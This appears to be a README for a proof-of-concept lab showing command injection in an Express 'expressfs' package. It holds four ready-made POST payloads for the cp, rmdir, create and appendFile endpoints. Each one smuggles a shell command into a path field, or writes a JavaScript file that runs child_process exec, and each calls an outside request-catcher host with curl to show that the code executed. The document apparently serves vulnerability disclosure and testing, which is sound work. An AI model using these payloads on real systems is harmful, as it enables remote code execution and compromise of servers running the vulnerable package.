Command Injection @ expressfs

Installation

docker-compose up --build

open the browser and enter the following url https://shieldfy.requestcatcher.com/

NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
launch this POST request from postman http://localhost:8000/expressfs.cp
- BODY
  
  KEY VALUE
  
  destination /tmp/test;curl https://shieldfy.requestcatcher.com/hacked-expressfs.cp
CHECK the requestcatcher tab in the browser you will see the result of command injection attack

open the browser and enter the following url https://shieldfy.requestcatcher.com/

NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
launch this POST request from postman http://localhost:8000/expressfs.rmdir
- BODY
  
  KEY VALUE
  
  path /tmp/test;curl https://shieldfy.requestcatcher.com/hacked-expressfs.rmdir
CHECK the requestcatcher tab in the browser you will see the result of command injection attack

open the browser and enter the following url https://shieldfy.requestcatcher.com/

NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
launch this POST request from postman http://localhost:8000/expressfs.create
- BODY
  
  KEY VALUE
  
  path ./eviil.js
  
  content exec = require('child_process').exec;exec("curl https://shieldfy.requestcatcher.com/hacked-expressfs.create")
CHECK the requestcatcher tab in the browser you will see the result of command injection attack

open the browser and enter the following url https://shieldfy.requestcatcher.com/

NOTE: we will use the previous 'requestcatcher' to catch the request that we will launch from the next step as command injection attack
launch this POST request from postman http://localhost:8000/expressfs.appendFile
- BODY
  
  KEY VALUE
  
  path ./eviil.js
  
  content ; exec = require('child_process').exec;exec("curl https://shieldfy.requestcatcher.com/hacked-expressfs.appendFile")
CHECK the requestcatcher tab in the browser you will see the result of command injection attack

Name		Name	Last commit message	Last commit date
Latest commit History 2 Commits
src		src
test		test
.dockerignore		.dockerignore
.gitignore		.gitignore
Dockerfile		Dockerfile
Makefile		Makefile
docker-compose.yml		docker-compose.yml
package-lock.json		package-lock.json
package.json		package.json
package.space		package.space
readme.md		readme.md

KEY	VALUE
path	./eviil.js
content	exec = require('child_process').exec;exec("curl https://shieldfy.requestcatcher.com/hacked-expressfs.create")